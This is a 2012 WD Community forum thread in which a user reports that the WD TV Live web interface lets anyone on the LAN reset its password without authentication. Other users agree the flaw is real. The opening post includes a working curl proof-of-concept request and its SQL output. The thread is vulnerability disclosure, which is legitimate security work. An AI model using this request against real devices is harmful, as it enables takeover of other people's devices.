- WD Community
- :
- WD TV Products
- :
- WD TV Live Streaming
- :
- Live Streaming Discussions
- :
- Security: Password reset possible from internal LA...
- WD Community
- News & Assistance
- Announcements
- New to Community
- Forum Feedback
- Off-Topic
- Software & Apps
- WD Software
- WD Mobile Apps
- Software & Accessory Ideas
- WD TV Live Streaming
- Live Streaming Discussions
- Live Streaming Firmware
- Live Streaming Ideas
- Live Streaming Issues
- WD TV Live Hub
- Hub Discussions
- Hub Firmware
- Hub Themes
- WD TV Live Hub Ideas
- WD TV Live Hub Issue Reporting
- WD TV Play
- WD TV Play
- Live & Live Plus
- Live Discussions
- Live Firmware
- Elements Play
- Elements Play
- External Drives
- Mac Externals
- PC Externals
- Portable Drives
- External Drive Ideas
- Network Devices
- Networking Devices
- Live Duo
- Sentinel
- My Book Live
- Other Network Drives
- Network Product Ideas
- Internal Drives
- Desktop & Portable
- Internal Drive Ideas
- Anuncios
- Noticias
- Nuevo a La Comunidad
- Los Productos de WD
- Software y Accesorios
- Reproductores Multimedia
- Unidades de Red
- Unidades Externas
- Unidades Internas
- Ankuendigungen
- Neuigkeiten
- Neu in der Community
- WD Produkte
- WD Programme
- WD TV Media Player
- Netzwerk Laufwerke
- Externe Laufwerke
- Interne Laufwerke
- Annunci
- Annunci e Novita'
- Nuovo per La Comunita'
- Prodotti WD
- Programmi & Accessori
- Riproduttori Multimediali
- Dischi di Rete
- Dischi Esterni
- Dischi Interni
- WD TV Legacy
- Hub Network
- Live Networking
- WD TV HD
- WD TV Mini
- Software
- WD Photos
- Other Software & Accessories
- Hard Drives
- WD ShareSpace
- Other Externals
- Other Internal Drives
- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic to the Top
- Bookmark
- Subscribe
- Printer Friendly Page
Security: Password reset possible from internal LAN IP w/o authentica tion
[ Edited ]
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
06-17-2012 06:23 AM - edited 06-19-2012 01:15 PM
It is possible to set a new password for the web interface without further authentication. (One does not have to know the old web interface password to set a new password.)
A HTTP POST request to /DB/modfiy_pwd.php on WDTV Live will overwrite the web interface's password.
Example request using curl:
#!/bin/sh
#IP of WDTV Live:
WDTVLIVE=1.2.3.4
curl -d "password=bla" http://${WDTVLIVE}/DB/modfiy_pw.php
Output:
blaUPDATE web_password SET user_password_pw="bla" where user_id="1"1
Now you can login to the web interface using password 'bla'.
---
Firmware: 1.09.10 and lower
What hardware and media were you using? WDTV Live SMP (european)
Does it happen every time? sure.
Does it happen with previous firmware? yes.
Does power cycling the unit solve it? of course not.
Does resetting to factory defaults solve it? of course not.
Have you tried this on other devices? WDTVLive Hub
Re: Security: Password reset possible from internal LAN IP w/o authentica tion
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
06-18-2012 11:17 AM
Eeek!
Nasty.
Re: Security: Password reset possible from internal LAN IP w/o authentica tion
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
06-18-2012 12:19 PM
well, it's getting even better - stay tuned ![]()
I believe this is an "issue" rather than a "discussion topic" so would the moderators be so kind to move it back to http://community.wdc.com/t5/WD-TV-Live-Streaming-I
Re: Security: Password reset possible from internal LAN IP w/o authentica tion
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
06-18-2012 01:54 PM
double--- You'll need to also complete all the other info needed to have the issue examined.
Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentica tion
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
07-28-2012 03:20 AM
"This is not an issue and should not be posted here." (permalink)
Bill_S, could you please elaborate why this security flaw is not an issue and where else one should post issues with Western Digital's Live SMP devices?
Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentica tion
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
07-28-2012 05:36 AM
I agree with double08: This is a real issue; the programming for passwords on the WDTV is insecure.
This means that anyone can change the password on the WDTV without needing to know the current password, and then can immediately access the Web UI and make changes without permission.
Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentica tion
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Email to a Friend
- Report Inappropriate Content
08-02-2012 12:23 PM
*bump*
| Forums | Ideas | News and Announcements | Register | Sign in | Help | Forum Guidelines | |

